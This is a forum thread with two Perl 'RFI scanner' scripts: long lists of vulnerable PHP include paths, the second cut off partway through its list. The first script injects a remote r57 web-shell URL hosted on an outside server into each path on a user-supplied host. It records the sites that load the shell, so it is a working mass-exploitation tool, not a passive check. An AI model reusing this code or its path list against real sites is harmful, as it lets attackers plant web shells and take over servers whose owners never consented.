[Perl] Rfi vulnz scanner

**Floord** · 24.07.2009 23:01

Код:

#!/usr/bin/perl
#Scan a host for rfi vulnz
# by The[Boss] - korell@hotmail.it
use HTTP::Request;
use LWP::UserAgent;

&inizio;
sub inizio{
print q(
  ###########################
     Rfi vulnz scanner
       by The[Boss]
  ###########################
);
print "\n Insert host:(ex: http://www.site.com/)\n";
$host=<STDIN>;
chomp($host);
print "Ok lets scan..\n";
$rfi1="includes/header.php?systempath=";
$rfi2="Gallery/displayCategory.php?basepath=";
$rfi3="index.inc.php?PATH_Includes=";
$rfi4="nphp/nphpd.php?nphp_config[LangFile]=";
$rfi5="include/db.php?GLOBALS[rootdp]=";
$rfi6="ashnews.php?pathtoashnews=";
$rfi7="ashheadlines.php?pathtoashnews=";
$rfi8="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
$rfi9="demo/includes/init.php?user_inc=";
$rfi10="jaf/index.php?show=";
$rfi11="inc/shows.inc.php?cutepath=";
$rfi12="poll/admin/common.inc.php?base_path=";
$rfi13="pollvote/pollvote.php?pollname=";
$rfi14="sources/post.php?fil_config=";
$rfi15="modules/My_eGallery/public/displayCategory.php?basepath=";
$rfi16="bb_lib/checkdb.inc.php?libpach=";
$rfi17="include/livre_include.php?no_connect=lol&chem_absolu=";
$rfi18="index.php?from_market=Y&pageurl=";
$rfi19="modules/mod_mainmenu.php?mosConfig_absolute_path=";
$rfi20="pivot/modules/module_db.php?pivot_path=";
$rfi21="modules/4nAlbum/public/displayCategory.php?basepath=";
$rfi22="derniers_commentaires.php?rep=";
$rfi23="modules/coppermine/themes/default/theme.php?THEME_DIR=";
$rfi24="modules/coppermine/include/init.inc.php?CPG_M_DIR=";
$rfi25="modules/coppermine/themes/coppercop/theme.php?THEME_DIR=";
$rfi26="coppermine/themes/maze/theme.php?THEME_DIR=";
$rfi28="allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=";
$rfi29="allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=";
$rfi30="myPHPCalendar/admin.php?cal_dir=";
$rfi31="agendax/addevent.inc.php?agendax_path=";
$rfi32="modules/mod_mainmenu.php?mosConfig_absolute_path=";
$rfi33="modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=";
$rfi34="main.php?page=";
$rfi35="default.php?page=";
$rfi36="index.php?action=";
$rfi37="index1.php?p=";
$rfi38="index2.php?x=";
$rfi39="index2.php?content=";
$rfi40="index.php?conteudo=";
$rfi41="index.php?cat=";
$rfi42="include/new-visitor.inc.php?lvc_include_dir=";
$rfi43="modules/agendax/addevent.inc.php?agendax_path=";
$rfi44="shoutbox/expanded.php?conf=";
$rfi45="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
$rfi46="pivot/modules/module_db.php?pivot_path=";
$rfi47="library/editor/editor.php?root=";
$rfi48="library/lib.php?root=";
$rfi49="e107/e107_handlers/secure_img_render.php?p=";
$rfi50="zentrack/index.php?configFile=";
$rfi51="main.php?x=";
$rfi52="becommunity/community/index.php?pageurl=";
$rfi53="GradeMap/index.php?page=";
$rfi54="phpopenchat/contrib/yabbse/poc.php?sourcedir=";
$rfi55="calendar/calendar.php?serverPath=";
$rfi56="calendar/functions/popup.php?serverPath=";
$rfi57="calendar/events/header.inc.php?serverPath=";
$rfi58="calendar/events/datePicker.php?serverPath=";
$rfi59="calendar/setup/setupSQL.php?serverPath=";
$rfi60="calendar/setup/header.inc.php?serverPath=";
$rfi61="mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=";
$rfi62="zentrack/index.php?configFile=";
$rfi63="pivot/modules/module_db.php?pivot_path=";
$rfi64="inc/header.php/step_one.php?server_inc=";
$rfi65="install/index.php?lng=../../include/main.inc&G_PATH=";
$rfi66="inc/pipe.php?HCL_path=";
$rfi67="include/write.php?dir=";
$rfi68="include/new-visitor.inc.php?lvc_include_dir=";
$rfi69="includes/header.php?systempath=";
$rfi70="support/mailling/maillist/inc/initdb.php?absolute_path=";
$rfi71="coppercop/theme.php?THEME_DIR=";
$rfi72="zentrack/index.php?configFile=";
$rfi73="pivot/modules/module_db.php?pivot_path=";
$rfi74="inc/header.php/step_one.php?server_inc=";
$rfi75="install/index.php?lng=../../include/main.inc&G_PATH=";
$rfi76="inc/pipe.php?HCL_path=";
$rfi77="include/write.php?dir=";
$rfi78="include/new-visitor.inc.php?lvc_include_dir=";
$rfi79="includes/header.php?systempath=";
$rfi80="support/mailling/maillist/inc/initdb.php?absolute_path=";
$rfi81="coppercop/theme.php?THEME_DIR=";
$rfi82="becommunity/community/index.php?pageurl=";
$rfi83="shoutbox/expanded.php?conf=";
$rfi84="agendax/addevent.inc.php?agendax_path=";
$rfi85="myPHPCalendar/admin.php?cal_dir=";
$rfi86="yabbse/Sources/Packages.php?sourcedir=";
$rfi87="dotproject/modules/projects/addedit.php?root_dir=";
$rfi88="dotproject/modules/projects/view.php?root_dir=";
$rfi89="dotproject/modules/projects/vw_files.php?root_dir=";
$rfi90="dotproject/modules/tasks/addedit.php?root_dir=";
$rfi91="dotproject/modules/tasks/viewgantt.php?root_dir=";
$rfi92="My_eGallery/public/displayCategory.php?basepath=";
$rfi93="modules/My_eGallery/public/displayCategory.php?basepath=";
$rfi94="modules/4nAlbum/public/displayCategory.php?basepath=";
$rfi95="modules/coppermine/themes/default/theme.php?THEME_DIR=";
$rfi96="modules/agendax/addevent.inc.php?agendax_path=";
$rfi97="modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=";
$rfi98="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
$rfi99="modules/coppermine/include/init.inc.php?CPG_M_DIR=";
$rfi100="modules/mod_mainmenu.php?mosConfig_absolute_path=";
$rfi101="shoutbox/expanded.php?conf=";
$rfi102="pivot/modules/module_db.php?pivot_path=";
$rfi103="library/editor/editor.php?root=";
$rfi104="library/lib.php?root=";
$rfi105="e107/e107_handlers/secure_img_render.php?p=";
$rfi106="main.php?x=";
$rfi107="main.php?page=";
$rfi108="index.php?meio.php=";
$rfi109="index.php?include=";
$rfi110="index.php?inc=";
$rfi111="index.php?page=";
$rfi112="index.php?pag=";
$rfi113="index.php?p=";
$rfi114="index.php?x=";
$rfi115="index.php?open=";
$rfi116="index.php?visualizar=";
$rfi117="index.php?pagina=";
$rfi118="index2.php?content=";
$rfi119="inc/step_one_tables.php?server_inc=";
$rfi120="GradeMap/index.php?page=";
$rfi121="phpshop/index.php?base_dir=";
$rfi122="admin.php?cal_dir=";
$rfi123="contacts.php?cal_dir=";
$rfi124="convert-date.php?cal_dir=";
$rfi125="album_portal.php?phpbb_root_path=";
$rfi126="mainfile.php?MAIN_PATH=";
$rfi127="dotproject/modules/files/index_table.php?root_dir=";
$rfi128="html/affich.php?base=";
$rfi129="gallery/init.php?HTTP_POST_VARS=";
$rfi130="pm/lib.inc.php?pm_path=";
$rfi131="ideabox/include.php?gorumDir=";
$rfi132="index2.php?includes_dir=";
$rfi133="forums/toplist.php?phpbb_root_path=";
$rfi134="forum/toplist.php?phpbb_root_path=";
$rfi135="admin/config_settings.tpl.php?include_path=";
$rfi136="include/common.php?include_path=";
$rfi137="event/index.php?page=";
$rfi138="forum/index.php?includeFooter=";
$rfi139="forums/index.php?includeFooter=";
$rfi140="forum/bb_admin.php?includeFooter=";
$rfi141="forums/bb_admin.php?includeFooter=";
$rfi142="language/lang_english/lang_activity.php?phpbb_root_path=";
$rfi143="forum/language/lang_english/lang_activity.php?phpbb_root_path=";
$rfi144="blend_data/blend_common.php?phpbb_root_path=";
$rfi145="master.php?root_path=";
$rfi146="includes/kb_constants.php?module_root_path=";
$rfi147="forum/includes/kb_constants.php?module_root_path=";
$rfi148="forums/includes/kb_constants.php?module_root_path=";
$rfi149="classes/adodbt/sql.php?classes_dir=";
$rfi150="agenda.php3?rootagenda=";
$rfi151="agenda2.php3?rootagenda=";
$rfi152="sources/lostpw.php?CONFIG[path]=";
$rfi153="topsites/sources/lostpw.php?CONFIG[path]=";
$rfi154="toplist/sources/lostpw.php?CONFIG[path]=";
$rfi155="sources/join.php?CONFIG[path]=";
$rfi156="topsites/sources/join.php?CONFIG[path]=";
$rfi157="toplist/sources/join.php?CONFIG[path]=";
$rfi158="topsite/sources/join.php?CONFIG[path]=";
$rfi159="public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=";
$rfi160="extras/poll/poll.php?file_newsportal=";
$rfi161="index.php?site_path=";
$rfi162="mail/index.php?site_path=";
$rfi163="fclick/show.php?path=";
$rfi164="show.php?path=";
$rfi165="calogic/reconfig.php?GLOBALS[CLPath]=";
$rfi166="eshow.php?Config_rootdir=";
$rfi167="auction/auction_common.php?phpbb_root_path=";
$rfi168="index.php?inc_dir=";
$rfi169="calendar/index.php?inc_dir=";
$rfi170="modules/TotalCalendar/index.php?inc_dir=";
$rfi171="modules/calendar/index.php?inc_dir=";
$rfi172="calendar/embed/day.php?path=";
$rfi173="ACalendar/embed/day.php?path=";
$rfi174="calendar/add_event.php?inc_dir=";
$rfi175="claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=";
$rfi176="claroline/auth/ldap/authldap.php?includePath=";
$rfi177="docebo/modules/credits/help.php?lang=";
$rfi178="modules/credits/help.php?lang=";
$rfi179="config.php?returnpath=";
$rfi180="editsite.php?returnpath=";
$rfi181="in.php?returnpath=";
$rfi182="addsite.php?returnpath=";
$rfi183="includes/pafiledb_constants.php?module_root_path=";
$rfi184="phpBB/includes/pafiledb_constants.php?module_root_path=";
$rfi185="pafiledb/includes/pafiledb_constants.php?module_root_path=";
$rfi186="auth/auth.php?phpbb_root_path=";
$rfi187="auth/auth_phpbb/phpbb_root_path=";
$rfi188="apc-aa/cron.php3?GLOBALS[AA_INC_PATH]=";
$rfi189="apc-aa/cached.php3?GLOBALS[AA_INC_PATH]=";
$rfi190="infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=";
$rfi191="phpdig/includes/config.php?relative_script_path=";
$rfi192="includes/phpdig/includes/config.php?relative_script_path=";
$rfi193="includes/dbal.php?eqdkp_root_path=";
$rfi194="eqdkp/includes/dbal.php?eqdkp_root_path=";
$rfi195="dkp/includes/dbal.php?eqdkp_root_path=";
$rfi196="include/SQuery/gameSpy2.php?libpath=";
$rfi197="include/global.php?GLOBALS[includeBit]=";
$rfi198="topsites/config.php?returnpath=";
$rfi199="manager/frontinc/prepend.php?_PX_config[manager_path]=";
$rfi200="ubbthreads/addpost_newpoll.php?addpoll=thispath=";
$rfi201="forum/addpost_newpoll.php?thispath=";
$rfi202="forums/addpost_newpoll.php?thispath=";
$rfi203="ubbthreads/ubbt.inc.php?thispath=";
$rfi204="forums/ubbt.inc.php?thispath=";
$rfi205="forum/ubbt.inc.php?thispath=";
$rfi206="forum/admin/addentry.php?phpbb_root_path=";
$rfi207="admin/addentry.php?phpbb_root_path=";
$rfi208="index.php?f=";
$rfi209="index.php?act=";
$rfi210="ipchat.php?root_path=";
$rfi211="includes/orderSuccess.inc.php?glob[rootDir]=";
$rfi212="stats.php?dir[func]=dir[base]=";
$rfi213="ladder/stats.php?dir[base]=";
$rfi214="ladders/stats.php?dir[base]=";
$rfi215="sphider/admin/configset.php?settings_dir=";
$rfi216="admin/configset.php?settings_dir=";
$rfi217="vwar/admin/admin.php?vwar_root=";
$rfi218="modules/vwar/admin/admin.php?vwar_root=";
$rfi219="modules/vWar_Account/includes/get_header.php?vwar_root=";
$rfi220="modules/vWar_Account/includes/functions_common.php?vwar_root2=";
$rfi221="sphider/admin/configset.php?settings_dir=";
$rfi222="admin/configset.php?settings_dir=";
$rfi223="impex/ImpExData.php?systempath=";
$rfi224="forum/impex/ImpExData.php?systempath=";
$rfi225="forums/impex/ImpExData.php?systempath=";
$rfi226="application.php?base_path=";
$rfi227="index.php?theme_path=";
$rfi228="become_editor.php?theme_path=";
$rfi229="add.php?theme_path=";
$rfi230="bad_link.php?theme_path=";
$rfi231="browse.php?theme_path=";
$rfi232="detail.php?theme_path=";
$rfi233="fav.php?theme_path=";
$rfi234="get_rated.php?theme_path=";
$rfi235="login.php?theme_path=";
$rfi236="mailing_list.php?theme_path=";
$rfi237="new.php?theme_path=";
$rfi238="modify.php?theme_path=";
$rfi239="pick.php?theme_path=";
$rfi240="power_search.php?theme_path=";
$rfi241="rating.php?theme_path=";
$rfi242="register.php?theme_path=";
$rfi243="review.php?theme_path=";
$rfi244="rss.php?theme_path=";
$rfi245="search.php?theme_path=";
$rfi246="send_pwd.php?theme_path=";
$rfi247="sendmail.php?theme_path=";
$rfi248="tell_friend.php?theme_path=";
$rfi249="top_rated.php?theme_path=";
$rfi250="user_detail.php?theme_path=";
$rfi251="user_search.php?theme_path=";
$rfi252="invoice.php?base_path=";
$rfi253="cgi-bin//classes/adodbt/sql.php?classes_dir=";
$rfi254="cgi-bin/install/index.php?G_PATH=";
$rfi255="cgi-bin/include/print_category.php?dir=";
$rfi256="includes/class_template.php?quezza_root_path=";
$rfi257="bazar/classified_right.php?language_dir=";
$rfi258="classified_right.php?language_dir=";
$rfi259="phpBazar/classified_right.php?language_dir=";
$rfi260="chat/messagesL.php3?cmd=";
$rfi261="phpMyChat/chat/messagesL.php3?cmd=";
$rfi262="bbs/include/write.php?dir=";
$rfi263="visitorupload.php?cmd=";
$rfi264="modules/center/admin/accounts/process.php?module_path]=";
$rfi265="index.php?template=";
$rfi266="armygame.php?libpath=";
$rfi267="lire.php?rub=";
$rfi268="pathofhostadmin/?page=";
$rfi269="apa_phpinclude.inc.php?apa_module_basedir=";
$rfi270="index.php?req_path=";
$rfi271="research/boards/encapsbb-0.3.2_fixed/index_header.php?root=";
$rfi272="Farsi1/index.php?archive=";
$rfi273="index.php?archive=";
$rfi274="show_archives.php?template=";
$rfi275="forum/include/common.php?pun_root=";
$rfi276="pmwiki wiki/pmwiki-2.1.beta20/pmwiki.php?GLOBALS[FarmD]=";
$rfi277="vuln.php?=";
$rfi278="cgi-bin//include/write.php?dir=";
$rfi279="admin/common.inc.php?basepath=";
$rfi280="pm/lib.inc.php?sfx=";
$rfi281="pm/lib.inc.php?pm_path=";
$rfi282="artmedic-kleinanzeigen-path/index.php?id=";
$rfi283="osticket/include/main.php?include_dir=";
$rfi284="include/main.php?config[search_disp]=include_dir=";
$rfi285="phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=";
$rfi286="quick_reply.php?phpbb_root_path=";
$rfi287="zboard/include/write.php?dir=";
$rfi288="admin/plog-admin-functions.php?configbasedir=";
$rfi289="content.php?content=";
$rfi290="q-news.php?id=";
$rfi291="_conf/core/common-tpl-vars.php?confdir=";
$rfi292="votebox.php?VoteBoxPath=";
$rfi293="al_initialize.php?alpath=";
$rfi294="include/db.php?GLOBALS[rootdp]=";
$rfi295="modules/news/archivednews.php?GLOBALS[language_home]=";
$rfi296="protection.php?siteurl=";
$rfi297="modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=";
$rfi298="index2.php?includes_dir=";
$rfi299="classes.php?LOCAL_PATH=";
$rfi300="extensions/moblog/moblog_lib.php?basedir=";
$rfi301="modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=";
$rfi302="phpWebLog/include/init.inc.php?G_PATH=";
$rfi303="admin/objects.inc.php4?Server=";
$rfi304="trg_news30/trgnews/install/article.php?dir=";
$rfi305="block.php?Include=";
$rfi306="arpuivo.php?data=";
$rfi307="setup/index.php?GALLERY_BASEDIR=";
$rfi308="include/help.php?base=";
$rfi309="index.php?[Home]=";
$rfi310="block.php?Include=";
$rfi311="examples/phonebook.php?page=";
$rfi312="PHPNews/auth.php?path=";
$rfi313="include/print_category.php?dir=";
$rfi314="skin/zero_vote/login.php?dir=";
$rfi315="skin/zero_vote/setup.php?dir=";
$rfi316="skin/zero_vote/ask_password.php?dir=";
$rfi317="gui/include/sql.php?include_path=";
$rfi318="webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=";
$rfi319="email.php?login=cer_skin=";
$rfi320="PhotoGal/ops/gals.php?news_file=";
$rfi321="index.php?custom=";
$rfi322="loginout.php?cutepath=";
$rfi323="oneadmin/config.php?path[docroot]=";
$rfi324="xcomic/initialize.php?xcomicRootPath=";
$rfi325="skin/zero_vote/setup.php?dir=";
$rfi326="skin/zero_vote/error.php? dir=";
$rfi327="admin_modules/admin_module_captions.inc.php?config[path_src_include]=";
$rfi328="admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=";
$rfi329="admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=";
$rfi330="admin_modules/admin_module_edit.inc.php?config[path_src_include]=";
$rfi331="admin_modules/admin_module_delimage.inc.php?config[path_src_include]=";
$rfi332="admin_modules/admin_module_deldir.inc.php?config[path_src_include]=";
$rfi333="src/index_overview.inc.php?config[path_src_include]=";
$rfi334="src/index_leftnavbar.inc.php?config[path_src_include]=";
$rfi335="src/index_image.inc.php?config[path_src_include]=";
$rfi336="src/image-gd.class.php?config[path_src_include]=";
$rfi337="src/image.class.php?config[path_src_include]=";
$rfi338="src/album.class.php?config[path_src_include]=";
$rfi339="src/show_random.inc.php?config[path_src_include]=";
$rfi340="src/main.inc.php?config[path_src_include]=";
$rfi341="src/index_passwd-admin.inc.php?config[path_admin_include]=";
$rfi342="yappa-ng/src/index_overview.inc.php?config[path_src_include]=";
$rfi343="admin_modules/admin_module_captions.inc.php?config[path_src_include]=";
$rfi344="admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=";
$rfi345="admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=";
$rfi346="admin_modules/admin_module_edit.inc.php?config[path_src_include]=";
$rfi347="admin_modules/admin_module_delimage.inc.php?config[path_src_include]=";
$rfi348="admin_modules/admin_module_deldir.inc.php?config[path_src_include]=";
$rfi349="src/index_overview.inc.php?config[path_src_include]=";
$rfi350="src/image-gd.class.php?config[path_src_include]=";
$rfi351="src/image.class.php?config[image_module]=";
$rfi352="src/album.class.php?config[path_src_include]=";
$rfi353="src/show_random.inc.php?config[path_src_include]=";
$rfi353="src/main.inc.php?config[path_src_include]=";
$rfi354="includes/db_adodb.php?baseDir=";
$rfi355="includes/db_connect.php?baseDir=";
$rfi356="includes/session.php?baseDir=";
$rfi357="modules/projects/gantt.php?dPconfig[root_dir]=";
$rfi358="modules/projects/gantt2.php?dPconfig[root_dir]=";
$rfi359="modules/projects/vw_files.php?dPconfig[root_dir]=";
$rfi360="modules/admin/vw_usr_roles.php?baseDir=";
$rfi361="modules/public/calendar.php?baseDir=";
$rfi362="modules/public/date_format.php?baseDir=";
$rfi363="modules/tasks/gantt.php?baseDir=";
$rfi364="mantis/login_page.php?g_meta_include_file=";
$rfi365="phpgedview/help_text_vars.php?PGV_BASE_DIRECTORY=";
$rfi366="modules/My_eGallery/public/displayCategory.php?basepath=";
$rfi367="dotproject/modules/files/index_table.php?root_dir=";
$rfi368="nukebrowser.php?filnavn=";
$rfi369="bug_sponsorship_list_view_inc.php?t_core_path=";
$rfi370="modules/coppermine/themes/coppercop/theme.php?THEME_DIR=";
$rfi371="modules/coppermine/themes/maze/theme.php?THEME_DIR=";
$rfi372="modules/coppermine/include/init.inc.php?CPG_M_DIR=";
$rfi373="includes/calendar.php?phpc_root_path=";
$rfi374="includes/setup.php?phpc_root_path=";
$rfi375="phpBB/admin/admin_styles.php?mode=";
$rfi376="aMember/plugins/db/mysql/mysql.inc.php?config=";
$rfi377="admin/lang.php?CMS_ADMIN_PAGE=";
$rfi378="inc/pipe.php?HCL_path=";
$rfi379="include/write.php?dir=";
$rfi380="becommunity/community/index.php?pageurl=";
$rfi381="modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=";
$rfi382="modules/mod_mainmenu.php?mosConfig_absolute_path=";
$rfi383="modules/agendax/addevent.inc.php?agendax_path=";
$rfi384="shoutbox/expanded.php?conf=";
$rfi385="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
$rfi386="index.php?page=";
$rfi387="index.php?pag=";
$rfi388="index.php?include=";
$rfi389="index.php?content=";
$rfi390="index.php?cont=";
$rfi391="index.php?c=";
$rfi392="modules/My_eGallery/index.php?basepath=";
$rfi393="modules/newbb_plus/class/forumpollrenderer.php?bbPath=";
$rfi394="journal.php?m=";
$rfi395="index.php?m=";
$rfi396="links.php?c=";
$rfi397="forums.php?m=";
$rfi398="list.php?c=";
$rfi399="user.php?xoops_redirect=";
$rfi400="index.php?id=";
$rfi401="r.php?url=";
$rfi402="CubeCart/includes/orderSuccess.inc.php?&glob[rootDir]=";
$rfi403="inc/formmail.inc.php?script_root=";
$rfi404="include/init.inc.php?G_PATH=";
$rfi405="backend/addons/links/index.php?PATH=";
$rfi406="modules/newbb_plus/class/class.forumposts.php?bbPath[path]=";
$rfi407="modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=";
$rfi408="protection.php?siteurl=";
$rfi409="htmltonuke.php?filnavn=";
$rfi410="mail_autocheck.php?pm_path=";
$rfi411="index.php?p=";
$rfi412="modules/4nAlbum/public/displayCategory.php?basepath=";
$rfi413="e107/e107_handlers/secure_img_render.php?p=";
$rfi414="include/new-visitor.inc.php?lvc_include_dir=";
$rfi415="community/modules/agendax/addevent.inc.php?agendax_path=";
$rfi416="library/editor/editor.php?root=";
$rfi417="library/lib.php?root=";
$rfi418="zentrack/index.php?configFile=";
$rfi419="pivot/modules/module_db.php?pivot_path=";
$rfi420="myPHPCalendar/admin.php?cal_dir=";
$rfi421="index.php/main.php?x=";
$rfi422="os/pointer.php?url=";
$rfi423="p_uppc_francais/pages_php/p_aidcon_conseils/index.php?FM=";
$rfi424="db.php?path_local=";
$rfi425="phpGedView/individual.php?PGV_BASE_DIRECTORY=";
$rfi426="index.php?kietu[url_hit]=";
$rfi427="phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=";
$rfi428="Sources/Packages.php?sourcedir=";
$rfi429="modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=";
$rfi430="cgi-bin//gadgets/Blog/BlogModel.php?path=";

$int = $values[ rand(4) ];
for($int=1;$int<430;$int++){
@cmdgif="http://usuarios.lycos.es/poizonbox/r57.txt?";
$lol="rfi";
$asd=$lol.$int;
$url2="http://".$host."/".$$asd."@cmdgif?";
my $req=HTTP::Request->new(GET=>$url2);
my $ua=LWP::UserAgent->new();
$ua->timeout(10);
my $response=$ua->request($req);

if ($response->is_success) {
 if( $response->content =~ /r57shell/ && $response->content =~ /by/ ){
open(FILE,">>file.txt");
print FILE "$url2\n";
close(FILE);
print "$url2 is vulnz..\n";
}}
}
}

**Floord** · 10.09.2009 21:38

Код:

#!/usr/bin/perl

######################################################

#   Author  :  Immortal, Immortalv2 , Clvn3445

#   Program :  Rfi Scanner (Priv8!)

#  Programers :  immortal, immortalv2 , Clvn3445

######################################################

# - Keep Priv8 -

# - Keep Priv8 -

# - Keep Priv8 -

# - Keep Priv8 -

 

use LWP::UserAgent;

use HTTP::Request;

system("cls");



print q{

-------------------------------------------------------------

  RFI SCANNER

-------------------------------------------------------------

};

#Insert Link

print "Please Insert Link: ";

chomp($link = <STDIN>);



#Host with http

if($link !~ /http:\/\//) { $link = "http://".$link; }



print "Please Wait\n\n";



#Start Scanning (1215 path)



@lol = ('includes/header.php?systempath=',

'Gallery/displayCategory.php?basepath=',

'index.inc.php?PATH_Includes=',

'nphp/nphpd.php?nphp_config[LangFile]=',

'include/db.php?GLOBALS[rootdp]=',

'ashnews.php?pathtoashnews=',

'ashheadlines.php?pathtoashnews=',

'modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=',

'demo/includes/init.php?user_inc=',

'jaf/index.php?show=',

'inc/shows.inc.php?cutepath=',

'poll/admin/common.inc.php?base_path=',

'pollvote/pollvote.php?pollname=',

'sources/post.php?fil_config=',

'modules/My_eGallery/public/displayCategory.php?basepath=',

'bb_lib/checkdb.inc.php?libpach=',

'include/livre_include.php?no_connectlol&chem_absolu=',

'index.php?from_marketY&pageurl=',

'modules/mod_mainmenu.php?mosConfig_absolute_path=',

'pivot/modules/module_db.php?pivot_path=',

'modules/nAlbum/public/displayCategory.php?basepath=',

'derniers_commentaires.php?rep=',

'modules/coppermine/themes/default/theme.php?THEME_DIR=',

'modules/coppermine/include/init.inc.php?CPG_M_DIR=',

'modules/coppermine/themes/coppercop/theme.php?THEME_DIR=',

'coppermine/themes/maze/theme.php?THEME_DIR=',

'allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=',

'allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=',

'myPHPCalendar/admin.php?cal_dir=',

'agendax/addevent.inc.php?agendax_path=',

'modules/mod_mainmenu.php?mosConfig_absolute_path=',

'modules/PNphpBB/includes/functions_admin.php?phpbb_root_path=',

'main.php?page=',

'default.php?page=',

'index.php?action=',

'index.php?p=',

'index.php?x=',

'index.php?content=',

'index.php?conteudo=',

'index.php?cat=',

'include/new-visitor.inc.php?lvc_include_dir=',

'modules/agendax/addevent.inc.php?agendax_path=',

'shoutbox/expanded.php?conf=',

'modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=',

'pivot/modules/module_db.php?pivot_path=',

'library/editor/editor.php?root=',

'library/lib.php?root=',

'e/e_handlers/secure_img_render.php?p=',

'zentrack/index.php?configFile=',

'main.php?x=',

'becommunity/community/index.php?pageurl=',

'GradeMap/index.php?page=',

'phpopenchat/contrib/yabbse/poc.php?sourcedir=',

'calendar/calendar.php?serverPath=',

'calendar/functions/popup.php?serverPath=',

'calendar/events/header.inc.php?serverPath=',

'calendar/events/datePicker.php?serverPath=',

'calendar/setup/setupSQL.php?serverPath=',

'calendar/setup/header.inc.php?serverPath=',

'mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=',

'zentrack/index.php?configFile=',

'pivot/modules/module_db.php?pivot_path=',

'inc/header.php/step_one.php?server_inc=',

'install/index.php?lng../../include/main.inc&G_PATH=',

'inc/pipe.php?HCL_path=',

'include/write.php?dir=',

'include/new-visitor.inc.php?lvc_include_dir=',

'includes/header.php?systempath=',

'support/mailling/maillist/inc/initdb.php?absolute_path=',

'coppercop/theme.php?THEME_DIR=',

'zentrack/index.php?configFile=',

'pivot/modules/module_db.php?pivot_path=',

'inc/header.php/step_one.php?server_inc=',

'install/index.php?lng../../include/main.inc&G_PATH=',

'inc/pipe.php?HCL_path=',

'include/write.php?dir=',

'include/new-visitor.inc.php?lvc_include_dir=',

'includes/header.php?systempath=',

'support/mailling/maillist/inc/initdb.php?absolute_path=',

'coppercop/theme.php?THEME_DIR=',

'becommunity/community/index.php?pageurl=',

'shoutbox/expanded.php?conf=',

'agendax/addevent.inc.php?agendax_path=',

'myPHPCalendar/admin.php?cal_dir=',

'yabbse/Sources/Packages.php?sourcedir=',

'dotproject/modules/projects/addedit.php?root_dir=',

'dotproject/modules/projects/view.php?root_dir=',

'dotproject/modules/projects/vw_files.php?root_dir=',

'dotproject/modules/tasks/addedit.php?root_dir=',

'dotproject/modules/tasks/viewgantt.php?root_dir=',

'My_eGallery/public/displayCategory.php?basepath=',

'modules/My_eGallery/public/displayCategory.php?basepath=',

'modules/nAlbum/public/displayCategory.php?basepath=',

'modules/coppermine/themes/default/theme.php?THEME_DIR=',

'modules/agendax/addevent.inc.php?agendax_path=',

'modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=',

'modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=',

'modules/coppermine/include/init.inc.php?CPG_M_DIR=',

'modules/mod_mainmenu.php?mosConfig_absolute_path=',

'shoutbox/expanded.php?conf=',

'pivot/modules/module_db.php?pivot_path=',

'library/editor/editor.php?root=',

'library/lib.php?root=',

'e/e_handlers/secure_img_render.php?p=',

'main.php?x=',

'main.php?page=',

'index.php?meio.php=',

'index.php?include=',

'index.php?inc=',

'index.php?page=',

'index.php?pag=',

'index.php?p=',

'index.php?x=',

'index.php?open=',

'index.php?visualizar=',

'index.php?pagina=',

'index.php?content=',

'inc/step_one_tables.php?server_inc=',

'GradeMap/index.php?page=',

'phpshop/index.php?base_dir=',

'admin.php?cal_dir=',

'contacts.php?cal_dir=',

'convert-date.php?cal_dir=',

'album_portal.php?phpbb_root_path=',

'mainfile.php?MAIN_PATH=',

'dotproject/modules/files/index_table.php?root_dir=',

'html/affich.php?base=',

'gallery/init.php?HTTP_POST_VARS=',

'pm/lib.inc.php?pm_path=',

'ideabox/include.php?gorumDir=',

'index.php?includes_dir=',

'forums/toplist.php?phpbb_root_path=',

'forum/toplist.php?phpbb_root_path=',

'admin/config_settings.tpl.php?include_path=',

'include/common.php?include_path=',

'event/index.php?page=',

'forum/index.php?includeFooter=',

'forums/index.php?includeFooter=',

'forum/bb_admin.php?includeFooter=',

'forums/bb_admin.php?includeFooter=',

'language/lang_english/lang_activity.php?phpbb_root_path=',

'forum/language/lang_english/lang_activity.php?phpbb_root_path=',

'blend_data/blend_common.php?phpbb_root_path=',

'master.php?root_path=',

'includes/kb_constants.php?module_root_path=',

'forum/includes/kb_constants.php?module_root_path=',

'forums/includes/kb_constants.php?module_root_path=',

'classes/adodbt/sql.php?classes_dir=',

'agenda.php?rootagenda=',

'agenda.php?rootagenda=',

'sources/lostpw.php?CONFIG[path]=',

'topsites/sources/lostpw.php?CONFIG[path]=',

'toplist/sources/lostpw.php?CONFIG[path]=',

'sources/join.php?CONFIG[path]=',

'topsites/sources/join.php?CONFIG[path]=',

'toplist/sources/join.php?CONFIG[path]=',

'topsite/sources/join.php?CONFIG[path]=',

'public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=',

'extras/poll/poll.php?file_newsportal=',

'index.php?site_path=',

'mail/index.php?site_path=',

'fclick/show.php?path=',

'show.php?path=',

'calogic/reconfig.php?GLOBALS[CLPath]=',

'eshow.php?Config_rootdir=',

